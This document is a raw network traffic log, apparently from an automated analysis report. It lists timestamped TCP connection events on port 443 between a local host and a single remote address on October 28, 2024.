                                                                                                                                                                            Oct 28, 2024 19:12:59.621052980 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.674108982 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.694843054 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.694864035 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.698718071 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.698724985 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.713597059 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.713663101 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.713735104 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.714622021 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.714622021 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.714641094 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.714648962 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.720768929 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.722965956 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.722990036 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.726941109 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.726946115 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.737426996 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.737471104 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.737642050 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.737987995 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.738001108 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763184071 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763223886 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763279915 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763286114 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.763328075 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.773192883 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.773216963 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.773258924 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.773263931 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.782289028 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.782346010 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.782424927 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.783257961 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.783273935 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.830713987 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.830817938 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.830918074 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.831242085 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.831269026 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.831284046 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.831291914 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.841283083 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.841327906 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.843024969 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.843642950 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.843657970 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867842913 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867882013 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867934942 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.867943048 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867988110 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.868284941 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.868309975 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.874236107 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.874275923 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.874372959 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.874620914 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.874634027 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.417901039 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.418673992 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.418732882 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.419214964 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.419228077 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.497392893 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.497937918 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.497953892 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.498452902 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.692626953 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.692792892 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.693062067 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.693229914 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.693229914 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.693243027 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.693250895 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.698972940 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.698992014 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.702066898 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.702179909 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.702188969 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.235833883 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.242974997 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.242995977 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.246974945 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.246978998 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.299069881 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.301130056 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.301172972 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.305360079 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.305383921 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.356184959 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.381896973 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.382071018 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.382143021 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.400850058 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.437932968 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.438029051 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.438076973 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.438092947 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.438137054 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.456828117 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.464276075 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.491565943 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.491583109 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.494015932 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.494029045 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.494983912 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.495017052 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.498922110 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.498945951 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499166012 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499180079 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499520063 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499524117 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499694109 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499708891 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499717951 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499722004 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.505214930 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.505248070 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.505265951 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.505274057 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.510996103 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.511048079 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.511109114 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.511640072 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.511657953 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.512818098 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.512855053 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.512907982 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.513104916 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.513114929 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.629956007 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.630242109 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.630299091 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.630548954 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.630568981 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.630578995 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.630584955 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.631015062 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.631169081 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.631215096 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.632900953 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.632910967 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.632925987 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.632930994 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.633958101 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.634018898 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.634066105 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.635873079 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.635922909 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.635991096 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.638863087 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.638887882 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.638902903 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.638910055 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.639955044 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.639976025 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.641594887 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.641608953 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.641669989 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.641827106 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.641839027 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.642191887 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.642231941 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.642287970 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.642381907 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.642400026 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.280956984 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.281588078 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.281615019 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.282087088 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.282092094 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.290714025 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.291122913 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.291157007 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.291711092 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.291723013 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.389928102 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.390490055 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.390552998 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.390964031 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.390974998 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.415488958 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.478574991 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.478574991 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.478579998 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.478581905 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.480957985 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.480969906 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.481038094 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.481156111 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.481165886 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.351922989 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.352510929 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.352550983 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.352677107 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.353043079 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.353054047 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.353132963 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.353161097 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.353532076 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.353535891 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.482366085 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.482923985 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.482969046 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.483417034 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.483423948 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487143040 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487196922 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487659931 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.487673998 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487694025 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.487715960 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.488127947 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.488132954 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.488284111 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.488290071 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489115000 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489492893 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489573002 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.489625931 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.489625931 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.489650965 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489665985 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490601063 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490755081 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490813017 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.490912914 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.490926981 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490936995 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.490945101 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493505001 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493541002 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493571043 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493598938 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493654966 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493701935 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493715048 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493737936 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493889093 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493921995 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618736982 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618768930 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618818998 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618832111 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.618868113 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.619124889 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.619153023 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.619164944 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.619169950 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.622328043 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.622390985 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.622500896 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.622648001 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.622679949 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629010916 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629103899 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629297018 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.629332066 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.629343987 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629354000 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.629359007 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.631532907 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.631570101 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.631721973 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.631834030 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.631844044 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.637758970 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.637931108 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.637989998 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.638036013 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.638041973 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.638050079 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.638052940 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.640320063 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.640338898 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.640405893 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.640507936 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.640518904 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.283210993 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.283826113 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.283859968 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.284296036 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.284303904 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.288544893 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.288913012 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.288924932 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.289313078 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.289319038 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.387640953 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.388206959 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.388276100 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.388681889 CET59282443192.168.2.413.107.253.45
